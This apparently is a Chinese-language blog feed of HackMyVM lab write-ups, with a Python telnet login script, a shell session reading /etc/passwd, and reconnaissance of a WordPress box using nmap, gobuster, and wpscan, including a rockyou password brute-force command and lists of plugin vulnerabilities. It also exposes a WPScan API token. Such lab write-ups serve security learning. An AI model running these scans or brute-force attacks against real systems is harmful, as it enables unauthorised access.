HOST = '127.0.0.1'
PORT = 23

USER = b"Eecho"
PASS = b"2VQzte2RBr8p8MuOA0Gw2Sum"   # 改成真实密码

def reject_opts(data):
    resp = b''
    i = 0
    while i + 2 < len(data):
        if data[i] == 0xff:       # IAC
            cmd = data[i+1]
            opt = data[i+2]
            if cmd == 0xfd:       # DO  -> WONT
                resp += b'\xff\xfc' + bytes([opt])
            elif cmd == 0xfb:     # WILL -> DONT
                resp += b'\xff\xfe' + bytes([opt])
            i += 3
        else:
            i += 1
    return resp

s = socket.socket()
s.settimeout(5)
s.connect((HOST, PORT))

# 先处理协商，直到看到 login:
for r in range(10):
    try:
        time.sleep(0.4)
        data = s.recv(4096)
        print(f"[RECV{r}]", data)

        resp = reject_opts(data)
        if resp:
            print(f"[SEND{r}]", resp)
            s.send(resp)

        if b"login:" in data.lower():
            break
    except:
        pass

# 发送用户名
time.sleep(0.3)
print("[SEND] USER")
s.send(USER + b"\r\n")

# 等 Password:
while True:
    time.sleep(0.4)
    try:
        data = s.recv(4096)
        print("[RECV-PASS]", data)

        resp = reject_opts(data)
        if resp:
            s.send(resp)

        if b"password" in data.lower():
            break

        if b"login incorrect" in data.lower():
            print("[!] Login failed before password stage")
            s.close()
            exit()
    except:
        pass

# 发送密码
time.sleep(0.3)
print("[SEND] PASS")
s.send(PASS + b"\r\n")

# 读最终结果
time.sleep(1)
try:
    data = s.recv(4096)
    print("[RECV-FINAL]", data)
except:
    print("[!] no final response")

s.close()
EOF

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# telnet 127.0.0.1   
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.

Linux 4.19.0-27-amd64 (localhost) (pts/2)

Happiness login: Eecho
Password: 
Last login: Sat Jan 24 02:53:51 EST 2026 from 192.168.0.108 on pts/1
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Eecho@Happiness:~$ 
改个密码new_passwd

echo@Happiness:/tmp/CVE-2021-4034-main$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
Eecho:x:1000:1000::/home/Eecho:/bin/bash
ftp:x:106:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

Eecho@Happiness:~$ ls -al
total 4040
drwxr-xr-x 3 Eecho Eecho    4096 Jan 24 02:53 .
drwxr-xr-x 3 root  root     4096 Jan 22 11:51 ..
-rw------- 1 Eecho Eecho   12315 Jan 24 02:53 .bash_history
-rw-r--r-- 1 Eecho Eecho     220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 Eecho Eecho    3526 Apr 18  2019 .bashrc
drwx------ 3 Eecho Eecho    4096 Jan 24 02:22 .gnupg
-rwxrwxrwx 1 Eecho Eecho  971926 Nov 15 10:04 linpeas.sh
-rw-r--r-- 1 Eecho Eecho     807 Apr 18  2019 .profile
-rwxrwxrwx 1 Eecho Eecho 3104768 Jan 11 08:51 pspy64
-rw-r--r-- 1 Eecho Eecho    9452 Jan 24 02:46 pspy_output.txt
-rw------- 1 Eecho Eecho      44 Jan 22 12:59 user.txt
Eecho@Happiness:~$ cd .gnupg/
Eecho@Happiness:~/.gnupg$ ls
private-keys-v1.d  pubring.kbx  trustdb.gpg

Eecho@Happiness:~/.gnupg$ cat pubring.kbx 
KBXfits5its5
Eecho@Happiness:~/.gnupg$ cat trustdb.gpg 
gpgits5
Eecho@Happiness:~/.gnupg$ cd private-keys-v1.d/
Eecho@Happiness:~/.gnupg/private-keys-v1.d$ ls
Eecho@Happiness:~/.gnupg/private-keys-v1.d$ ls -al
total 8
drwx------ 2 Eecho Eecho 4096 Jan 24 02:22 .
drwx------ 3 Eecho Eecho 4096 Jan 24 02:22 ..

提权不出来-放弃了

提权-wp

潜伏11年的Telnetd核弹漏洞：CVE-2026-24061零认证提权席卷全球，公开PoC触发全网紧急防御-CSDN博客

https://mp.weixin.qq.com/s?__biz=Mzk0MDQzNzY5NQ==&mid=2247494187&idx=1&sn=a91383587d33514f16787771ad5ebb7c&chksm=c3543eef0b49c5bff27c58a2c6154e256eced2f98a5a72cb9b73cd2579cafeb2b72dec675cee&mpshare=1&scene=23&srcid=0125VjcX4sgoiMS4vSYuzuSM&sharer_shareinfo=a2b798aab7f658305d3591e85f619072&sharer_shareinfo_first=a2b798aab7f658305d3591e85f619072#rd

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/qq-group/happiness/

HMV-Matrioshka

呼啸山庄 — Sat, 24 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"

192.168.0.105   08:00:27:41:3c:f7       (Unknown)

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# rustscan -a 192.168.0.105 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/root/.rustscan.toml"
Open 192.168.0.105:22
Open 192.168.0.105:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.105
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-23 06:38 EST


PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 b5:a4:7c:65:5c:1f:d7:89:42:bd:76:df:2c:8e:93:4e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP1XOWXFRA4APUDEG4a/hcbKUOu0DkzxCHuEoI2py6/DVQ0h9qNkjVO8oCJRPNwNRUI05sSCB7WCwUYWuX+oDuU=
|   256 5d:3d:2b:43:fc:89:fa:24:a3:f4:73:5f:7b:89:6c:e3 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKNNjSS0msWGvbhNzXghC/zqaoTABTt/8T83ckjP31oo
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.61 ((Debian))
|_http-title: mamushka
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.61 (Debian)
MAC Address: 08:00:27:41:3C:F7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/23%OT=22%CT=%CU=41650%PV=Y%DS=1%DC=D%G=N%M=080027
OS:%TM=69735DB3%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)

Uptime guess: 6.169 days (since Sat Jan 17 02:34:29 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.0.105

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.0.105

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/_192.168.0.105/_26-01-23_06-45-05.txt

Target: http://192.168.0.105/

[06:45:05] Starting:                                    
[06:45:38] 301 -    0B  - /index.php  ->  http://192.168.0.105/
[06:45:38] 301 -    0B  - /index.php/login/  ->  http://192.168.0.105/login/
[06:45:40] 200 -    7KB - /license.txt
[06:45:53] 200 -    3KB - /readme.html
[06:46:11] 301 -  317B  - /wp-admin  ->  http://192.168.0.105/wp-admin/
[06:46:11] 301 -  319B  - /wp-content  ->  http://192.168.0.105/wp-content/
[06:46:11] 200 -    0B  - /wp-content/
[06:46:11] 301 -  320B  - /wp-includes  ->  http://192.168.0.105/wp-includes/
[06:46:14] 200 -    0B  - /wp-cron.php
[06:46:14] 302 -    0B  - /wp-signup.php  ->  http://mamushka.hmv/wp-login.php?action=register
[06:46:15] 200 -    2KB - /wp-login.php
[06:46:17] 400 -    1B  - /wp-admin/admin-ajax.php
[06:46:23] 409 -    3KB - /wp-admin/setup-config.php

Task Completed

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u 192.168.0.105 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.105
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              yaml,php,txt,html,zip,db,bak,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.0.105/]                                       
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.0.105/wp-content/]                          
/wp-login.php         (Status: 200) [Size: 3931]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.0.105/wp-includes/]                         
/readme.html          (Status: 200) [Size: 7409]
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.0.105/wp-admin/]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://mamushka.hmv/wp-login.php?action=register]

Annie Steiner
CEO, Greenprint

┌──(web)─(root㉿kali)-[/home/kali]
└─# wpscan --url mamushka.hmv         
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://mamushka.hmv/ [192.168.0.105]
[+] Started: Fri Jan 23 20:19:36 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.61 (Debian)
 |  - X-Powered-By: PHP/8.2.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://mamushka.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
 | Found By: Query Parameter In Install Page (Aggressive Detection)
 |  - http://mamushka.hmv/wp-includes/css/dashicons.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-includes/css/buttons.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-admin/css/forms.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-admin/css/l10n.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-admin/css/install.min.css?ver=6.9

[+] WordPress theme in use: twentytwentyfour
 | Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
 | Last Updated: 2025-12-03T00:00:00.000Z
 | Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] ultimate-member
 | Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
 | Last Updated: 2025-12-16T20:04:00.000Z
 | [!] The version is out of date, the latest version is 2.11.1
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.8.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <> (0 / 137)   Checking Config Backups - Time: 00:00:00 <> (3 / 137)   Checking Config Backups - Time: 00:00:00 <> (15 / 137)  Checking Config Backups - Time: 00:00:00 <> (22 / 137)  Checking Config Backups - Time: 00:00:00 <> (32 / 137)  Checking Config Backups - Time: 00:00:00 <> (39 / 137)  Checking Config Backups - Time: 00:00:00 <> (47 / 137)  Checking Config Backups - Time: 00:00:00 <> (59 / 137)  Checking Config Backups - Time: 00:00:00 <> (70 / 137)  Checking Config Backups - Time: 00:00:00 <> (83 / 137)  Checking Config Backups - Time: 00:00:00 <> (96 / 137)  Checking Config Backups - Time: 00:00:00 <> (107 / 137) Checking Config Backups - Time: 00:00:00 <> (120 / 137) Checking Config Backups - Time: 00:00:00 <> (132 / 137) Checking Config Backups - Time: 00:00:00 <> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jan 23 20:19:51 2026
[+] Requests Done: 178
[+] Cached Requests: 5
[+] Data Sent: 44.403 KB
[+] Data Received: 361.444 KB
[+] Memory used: 264.973 MB
[+] Elapsed time: 00:00:14

Ultimate Member 2.8.6（关键点）

当前版本：2.8.6
最新：2.11.1
历史上这个插件是漏洞重灾区：
- 未授权信息泄露
- 任意用户枚举
- 权限绕过
- profile / REST / AJAX 相关逻辑问题

XML-RPC 开启

XML-RPC 现在的价值主要是：

用户名存在性探测
弱口令 / 凭证复用（如果有用户名）
pingback 辅助攻击（有条件）

⚠️ 但：

WP 6.x + 默认配置
没拿到用户名前，收益有限

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# wpscan --url http://mamushka.hmv \
  -U admin \
  -P ../tools/wordlists/kali/rockyou.txt \ 
  --password-attack wp-login \
  -t 5

没爆出来

看了wp换个思路，我的wp扫的太少了，去注册apitoken

Wpscan扫描

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# wpscan --url http://mamushka.hmv -e u,ap --plugins-detection aggressive --api-token "NEzNxgvCrcyIZN1aYoHxHyUda29vcAIcsbaCrFngLA0"

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.28
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://mamushka.hmv/ [192.168.0.105]
[+] Started: Fri Jan 23 20:36:05 2026

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.61 (Debian)
 |  - X-Powered-By: PHP/8.2.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://mamushka.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://mamushka.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://mamushka.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
 | Found By: Query Parameter In Install Page (Aggressive Detection)
 |  - http://mamushka.hmv/wp-includes/css/dashicons.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-includes/css/buttons.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-admin/css/forms.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-admin/css/l10n.min.css?ver=6.9
 |  - http://mamushka.hmv/wp-admin/css/install.min.css?ver=6.9

[+] WordPress theme in use: twentytwentyfour
 | Location: http://mamushka.hmv/wp-content/themes/twentytwentyfour/
 | Last Updated: 2025-12-03T00:00:00.000Z
 | Readme: http://mamushka.hmv/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://mamushka.hmv/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Aggressive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://mamushka.hmv/wp-content/plugins/akismet/
 | Latest Version: 5.6
 | Last Updated: 2025-11-12T16:31:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/akismet/, status: 403
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 3.1.5
 |     References:
 |      - https://wpscan.com/vulnerability/1a2f3094-5970-4251-9ed0-ec595a0cd26c
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9357
 |      - http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
 |      - https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
 |
 | The version could not be determined.

[+] meta-generator-and-version-info-remover
 | Location: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/
 | Last Updated: 2025-09-23T17:32:00.000Z
 | Readme: http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
 | [!] The version is out of date, the latest version is 17.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/, status: 403
 |
 | Version: 16.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/meta-generator-and-version-info-remover/readme.txt

[+] ultimate-member
 | Location: http://mamushka.hmv/wp-content/plugins/ultimate-member/
 | Last Updated: 2025-12-16T20:04:00.000Z
 | Readme: http://mamushka.hmv/wp-content/plugins/ultimate-member/readme.txt
 | [!] The version is out of date, the latest version is 2.11.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://mamushka.hmv/wp-content/plugins/ultimate-member/, status: 403
 |
 | [!] 13 vulnerabilities identified:
 |
 | [!] Title: Ultimate Member < 2.8.7 - Cross-Site Request Forgery to Membership Status Change
 |     Fixed in: 2.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/2b670a80-2682-4b7f-a549-64a35345e630
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8520
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffddc03-d4ae-460e-972a-98804d947d09
 |
 | [!] Title: Ultimate Member < 2.8.7 - Authenticated (Contributor+) Stored Cross-Site Scripting
 |     Fixed in: 2.8.7
 |     References:
 |      - https://wpscan.com/vulnerability/7488f9f3-03ea-4f4e-b5fb-c0dd02c5bb59
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8519
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e394bb2-d505-4bf1-b672-fea3504bf936
 |
 | [!] Title: Ultimate Member < 2.9.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Profile Picture Update
 |     Fixed in: 2.9.0
 |     References:
 |      - https://wpscan.com/vulnerability/54a53b30-4249-4559-85f8-7aeac2dc0df2
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10528
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/0a9793b6-2186-46ef-b204-d8f8f154ebf3
 |
 | [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.9.2 - Information Exposure
 |     Fixed in: 2.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/cb9c5ef8-51f8-4a46-ae56-23302c5980aa
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0318
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ee149bf-ffa3-4906-8be2-9c3c40b28287
 |
 | [!] Title: Ultimate Member < 2.9.2 - Unauthenticated SQL Injection
 |     Fixed in: 2.9.2
 |     References:
 |      - https://wpscan.com/vulnerability/31ef60db-4847-4623-a194-8722e668e6ab
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0308
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e5bb98-2652-499a-b8cd-4ebfe1c1d890
 |
 | [!] Title: Ultimate Member < 2.10.0 - Authenticated SQL Injection
 |     Fixed in: 2.10.0
 |     References:
 |      - https://wpscan.com/vulnerability/90b5192a-ceee-4612-8e21-2341bae29cad
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12276
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/846f9828-2f1f-4d08-abfb-909b8d634d8a
 |
 | [!] Title: Ultimate Member < 2.10.1 - Unauthenticated SQLi
 |     Fixed in: 2.10.1
 |     References:
 |      - https://wpscan.com/vulnerability/1d39ff72-1178-4812-be55-9bf4b58bbbb6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1702
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/34adbae5-d615-4f8d-a845-6741d897f06c
 |
 | [!] Title: Ultimate Member <= 2.10.3 - Admin+ Arbitrary Function Call
 |     Fixed in: 2.10.4
 |     References:
 |      - https://wpscan.com/vulnerability/abc6e35c-d971-4c8f-bcd0-70c7e16ec067
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47691
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8b33c7-23ef-4b5c-bdb9-b4e548d18832
 |
 | [!] Title: Ultimate Member < 2.10.2 - Unauthenticated Blind SQL Injection
 |     Fixed in: 2.10.2
 |     References:
 |      - https://wpscan.com/vulnerability/76ea92aa-36c6-4455-b9ee-e4ed22202235
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f539e25-5483-417d-a3c5-e7034c03c673
 |
 | [!] Title: Ultimate Member < 2.11.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'value'
 |     Fixed in: 2.11.1
 |     References:
 |      - https://wpscan.com/vulnerability/9e9bc669-9105-4066-8e3e-3c6db9e62e91
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13217
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/876b57e0-cf1e-4ce9-ba85-a5d4554797bd
 |
 | [!] Title: Ultimate Member < 2.11.1 - Authenticated (Subscriber+) Profile Privacy Setting Bypass
 |     Fixed in: 2.11.1
 |     References:
 |      - https://wpscan.com/vulnerability/74b2060e-2580-4623-bd0f-c79571c422db
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-14081
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/aad57a68-c385-491f-a5a2-32906df4b52b
 |
 | [!] Title: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin < 2.11.1 - Unauthenticated Sensitive Information Exposure
 |     Fixed in: 2.11.1
 |     References:
 |      - https://wpscan.com/vulnerability/4519fed7-8a57-4f57-88f0-bbb3940b3811
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-12492
